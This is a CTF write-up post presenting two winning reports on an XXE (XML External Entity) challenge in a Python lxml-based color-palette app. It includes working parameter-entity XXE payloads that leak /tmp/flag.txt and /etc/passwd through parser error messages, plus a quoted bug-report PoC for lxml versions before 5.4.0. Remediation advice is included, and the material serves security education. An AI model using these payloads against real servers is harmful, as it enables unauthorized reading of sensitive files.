Dojo challenge #42 - Hex Color Palette winners & writeup

July 11, 2025

The Dojo challenge, Hex Color Palette, required participants to exploit an XXE (XML External Entity) vulnerability in order to trigger a file disclosure.

By crafting a malicious XML payload, they had to trick the parser into leaking the contents of a sensitive local file - specifically /tmp/flag.txt

๐Ÿ’ก Want to create your own monthly Dojo challenge and won a contributing award? Send us a message on Twitter!

The winners

Congrats to 0necloud, Cryptocat and 3c4d for the best write-ups! ๐Ÿฅณ

The swag is on its way! ๐ŸŽ

Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.

Read on to find out how one of the winners managed to solve the challenge.

OVERALL BEST WRITE-UPS

This time, things were a little different โ€“ and some context is needed.
The challenge was created by myself โ€“ @pwnwithlove โ€“ and while preparing it for release last month I realised that the original PoC no longer worked as expected.

After some investigation, I discovered that the issue was caused by an update to the Python lxml library.

In particular, a bug report from Anatoly Katyushin (heart1ess) revealed that payloads relying on parameter entities had worked reliably until this update โ€“ including in scenarios involving DTD injection and indirect file disclosure. However, changes in the underlying libxml2 library meant that lxml now blocked such payloads.

XXE resolve_entities bypass using Parameter Entity by Anatoly Katyushin

This change explains why the challenge suddenly stopped working: although the intended solution remained valid, the parser no longer processed parameter entities the way it used to โ€“ effectively breaking the error-based XXE vector the intended solution relied on.

To address this, we added a feature to Dojo that allows us to use the previous version of lxml when creating challenges, and I left the challenge itself unchanged.

Feature allowing Dojo to use the previous version of lxml

Instead, I have decided to publish two separate reports for this community write-up: one detailing the intended PoC before the lxml update, and another showcasing the exploitation technique based on Anatoly Katyushin (heart1ess) discovery!

โ€”โ€”โ€”โ€”โ€“ START OF 0necloudโ€˜s REPORT โ€”โ€”โ€”โ€”โ€”

Description

This challenge revolves around a Python web application that renders user-supplied XML data through a templated HTML interface. The application uses the lxml library to parse XML files and extract hexadecimal colour codes to populate a front-end colour palette. However, the XML parser is configured to allow external Document Type Definitions (DTDs) and resolve entities, which opens the door to an XML External Entity (XXE) injection vulnerability.

Due to insufficient input validation and insecure parser configurations, an attacker is able to inject arbitrary entity declarations, thereby allowing him to manipulate the server into disclosing files stored on it.

Exploitation

To identify potential vulnerabilities within an application, analysing the source code is an effective approach as it reveals insecure coding practices, such as improper input validation or the misuse of certain libraries. In this scenario, we are presented with a web application that accepts a user input, which is then parsed by the program - potentially influencing the contents returned to the user.

Code Analysis

The first step in performing our taint tracking is to examine how our input is being handled by the program. In this scenario, a Web Application Firewall URL-encodes the user input before it reaches the web server.

data = unquote(USER_INPUT)

try:
parsed_text, colors = promptFromXML(data)
except Exception as e:
parsed_text = f"Error : {str(e)}"
colors = []

print(template.render(output=parsed_text, colors=colors, image=None))

Our user input is first decoded using the unquote() function, returning to its original form (our raw input) before being passed to the parse_palette() function. The result of XML parsing, or any errors that occurs, is echoed back to the user in a templated HTML response. This hints that our payload could manipulate the contents of error messages, which often tend to be verbose.

def parse_palette(xml_data):
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
tree = etree.parse(io.StringIO(xml_data), parser)
root = tree.getroot()
colors = set()

# Only parsing hex color
for elem in root.iter():
if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
colors.add(elem.text.strip().lower())

return list(colors)

The parse_palette() function is where the bulk of the data processing lies at. There are a few key points that can be noted regarding the function's implementation:

  • load_dtd=True: allows the XML parser to load external DTDs
  • resolve_entities=True: enables the expansion of external entities
  • There is no sanitisation of the xml_data parameter

In the setup code, we can observe that there is a DTD file located at /tmp/xml/config.dtd:

with open("xml/config.dtd", 'w') as f:
f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')

Note the reference to an undefined entity %config_hex.

Conclusions drawn from Code Analysis

From the configuration of lxml.etree.XMLParser in which both load_dtd and resolve_entities were set to True, we can deduce that the application will:

  • 1. Load external DTDs from file paths
  • 2. Expand nested parameter entities
  • 3. Attempt to resolve file paths provided within entity values

From the DTD file stored at /tmp/xml/config.dtd which contains an undefined entity %config_hex, we can deduce the possibility of overriding this entity with arbitrary ones, which will be subsequently loaded by the parser. Based on this idea, we can slowly piece together a payload:

To begin with, we need to load the local DTD at /tmp/xml/config.dtd:

<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd"

Next, we need to override %config_hex, which could have nested parameter entities that would be expanded via the parser's resolve_entities=True configuration. We need to include the following:

<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">

This allows reads the contents of /tmp/flag.txt into the %flag entity.

<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">

This creates a nested entity %error that references a non-existent file path (aaa) with the flag appended to it.

%eval;

This expands %eval, which causes the parser to resolve %error.

Finally, we just need the parser to load /tmp/xml/config.dtd, which will then encounter %config_hex (which we have overridden).

%local_dtd;

The parser will then read the contents of /tmp/flag.txt into %flag, and within %error, construct a path file:///aaa/{FLAG_CONTENT}. Since the filepath aaa/{FLAG_CONTENT} most probably does not exist, an error containing the resolved path will be thrown, and the resolved path will be returned as part of the error message (hopefully).

Proof of Concept

Before we merge everything together, we need to note that some characters need to be replaced with their Unicode hex character codes to bypass parser restrictions and prevent premature expansions during entity parsing.

  • % -> &#x25;
  • & -> &#x26;
  • ' -> &#x27;

Double-encoding is also used to delay expansions. For example, &#x26;#x25; -> &#x25; -> %.

Flag Revealed

PAYLOAD:

<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY &#x25; flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaa/&#x25;flag;&#x27;>">&#x25;eval;'>
%local_dtd;
]>

FLAG: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}

Risk

This vulnerability presents a serious risk as it allows an attacker to read files on the server, leading to a loss of confidentiality. For example, we are able to leak the contents of /etc/passwd:

/etc/passwd leaked

Remediation

To remediate this vulnerability, the configuration options of the lxml.etree.XMLParser, in particular, load_dtd and resolve_entities should be set to False to prevent the loading of DTDs and entity expansions.

Input validation and sanitisation should be incorporated before the user input is processed by the parse_palette() function to prevent blacklisted characters and keywords (e.g. <!DOCTYPE, SYSTEM) from being parsed.

Additionally, error messages returned to the user should avoid including the XML parser's error messages as these could unintentionally leak file paths, stack traces, and in this scenario, the contents of arbitrary files.

โ€”โ€”โ€”โ€”โ€“ END OF 0necloudโ€˜s REPORT โ€”โ€”โ€”โ€”โ€”

As explained earlier, this approach no longer works with the current version of lxml.
Even with resolve_entities=True, it's no longer possible to trigger an XXE using parameter entities - which were previously exploitable regardless of this setting.

Now it's time to take a closer look at the behavior we discussed earlier - illustrated through CryptoCatโ€™s report ๐Ÿ‘‡

โ€”โ€”โ€”โ€”โ€“ START OF Crypto-Catโ€˜s REPORT โ€”โ€”โ€”โ€”โ€”

Description

With this application, you can now display your own hex color palettes and unleash your inner UX designer! Simply upload your own XML files to generate custom palettes. Can you find the flag?


The flag can be found in /tmp/flag.txt

Solution

In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Pwnii ๐Ÿ’œ

Source code review

setup.py

Starting with the server setup code, we see that the flag is places in the /tmp directory, along with a folder of templates and xml files.

os.chdir("/tmp/")
os.makedirs("templates", exist_ok=True)
os.makedirs("xml", exist_ok=True)

with open("flag.txt", "w") as f:
    f.write(flag)

There's a sample XML file and DTD.

with open("xml/sample.xml", 'w') as f:
f.write('''
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#FF5733</color>
<color>#1E3A8A</color>
<color>#2ECC71</color>
<color>#F1C40F</color>
<color>#8E44AD</color>
<color>#2C3E50</color>
<color>#FFC0CB</color>
<color>#00FFFF</color>
</colors>
''')

with open("xml/config.dtd", 'w') as f:
f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')

An index.tpl file is generated, I'll skip most of the CSS/HTML which does not seem relevant.

<div class="content">
<h2>Extracted Color Palette</h2>
<p class="debug">{{ output }}</p>
<div class="palette">
{% if colors %} {% for color in colors %}
<div class="color-box" style="background: {{ color }};">{{ color }}</div>
{% endfor %} {% else %}
<p class="debug">No colors detected.</p>
{% endif %}
</div>
</div>

challenge.py

Now onto the challenge code. It imports jinja2 and lxml which should make us think of SSTI and/or XXE vulnerabilities. It specifically loads version 5.3.2 of lxml so checking if it's the latest version or there are known vulnerabilities should be added to our TODO list.

from jinja2 import Environment, FileSystemLoader
lxml = import_v("lxml", "5.3.2")
from lxml import etree

Next, the template is loaded. The autoescape option will prevent XSS by escaping HTML variables.

template = Environment(
autoescape=True,
loader=FileSystemLoader('/tmp/templates'),
).get_template('index.tpl')

A parse_palette function is declared. First thing to note is it's susceptibility to XXE attacks:

- load_dtd=True โ†’ allows loading external/internal DTDs.
- resolve_entities=True โ†’ allows expanding general and parameter entities.

def parse_palette(xml_data):
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
tree = etree.parse(io.StringIO(xml_data), parser)
root = tree.getroot()
colors = set()

# Only parsing hex color
for elem in root.iter():
if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
colors.add(elem.text.strip().lower())

return list(colors)

However, there is some regex on the XML elements to ensure they match a hex colour code format. It must start with a #, followed by 3-6 hex characters e.g. #1337 or #420420.

There's one more function; promptFromXML. It simply takes a string and passes it to the parse_palette function we just looked at.

def promptFromXML(s: str):
if not s:
return "No XML data received.", []

return "Pallet successfully extracted", parse_palette(s)

Finally, the script ties it all together. It takes our user input (note this is URL-encoded by the WAF, hence the unquote) and passes it to the promptFromXML function. The parsed colours will be returned and then rendered using template.render.

data = unquote("USER_INPUT_GOES_HERE")

try:
parsed_text, colors = promptFromXML(data)
except Exception as e:
parsed_text = f"Error : {str(e)}"
colors = []

print(template.render(output=parsed_text, colors=colors, image=None))

Testing functionality

The setup.py code provided a sample XML file. It's a good idea to test it first, just to visualise the intended functionality of the app.

<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#1337</color>
<color>#420420</color>
</colors>

The colours are "successfully extracted" from our XML input and rendered in the template.

If we can exploit an XXE vulnerability to read flag.txt, we'll need to either:

  • Somehow render the contents as colour codes
  • Trigger an exception that leaks the contents via an error

XXE in lxml library

Remember when we reviewed the source code and made a note to check for known vulnerabilities in the lxml library? Well, version 5.4.0 was released ~6 weeks ago. Why wouldn't Pwnii include the latest version? ๐Ÿง

Let's check out the "bugs fixed" section in the release notes.

  • LP#2107279: Binary wheels use libxml2 2.13.8 and libxslt 1.1.43 to resolve several CVEs.
  • (Binary wheels for Windows continue to use a patched libxml2 2.11.9 and libxslt 1.1.39.)
  • Issue found by Anatoly Katyushin, see https://bugs.launchpad.net/lxml/+bug/2107279

Reviewing the link reveals some key information about versions 5.0.0 through 5.3.2.

  • lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction

However..

  • libxml doesn't restrict Parameter Entities, that leads to XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "/etc/passwd">
<!ENTITY &#x25; b "<!ENTITY c &#x27;&#x25;file;&#x27;>">
'>
%a;
%b;
]>
<msg>&c;</msg>

The challenge meets both conditions:

  • Using lxml < 5.4.0
  • resolve_entities is set to True

Error-based data exfiltration

Can we do something similar? Let's try and swap out the values.

<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
'>
%a;
%b;
]>
<colors><color>&c;</color></colors>

1. %file; reads /tmp/flag.txt (still allowed for parameter entities).
2. %b; creates a general entity c whose SYSTEM URI becomes meow://<contents-of-flag.txt>.
3. When the parser meets &c; it tries to fetch that URI but fails and raises an error (apparently meow is not a real protocol ๐Ÿ™€).
4. The wrapper catches the exception and prints it: Error : Invalid URI: meow://FLAG{.*}.

It worked! We get the flag: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G} ๐Ÿ˜Ž

Remediation

- Upgrade lxml >=โ€ฏ5.4.0.
- Disable load_dtd or at least resolve_entities when you do not expect complex DTDs.
- Sanityโ€‘check and fully whitelist incoming XML before feeding it to a parser.

Summary (TLDR)

In this challenge, we're given a colour palette viewer that parses XML files using an outdated version of lxml. Turns out, it's vulnerable to XXE. With both load_dtd and resolve_entities enabled, and version 5.3.2 in play, we can pull off a parameter entity injection to leak the contents of /tmp/flag.txt. Since the parser throws an error on weird URIs, we abuse that to leak the flag through a debug message. Classic error-based XXE, but with a nice UX-themed twist.

โ€”โ€”โ€”โ€”โ€“ END OF Cryptocatโ€˜s REPORT โ€”โ€”โ€”โ€”โ€”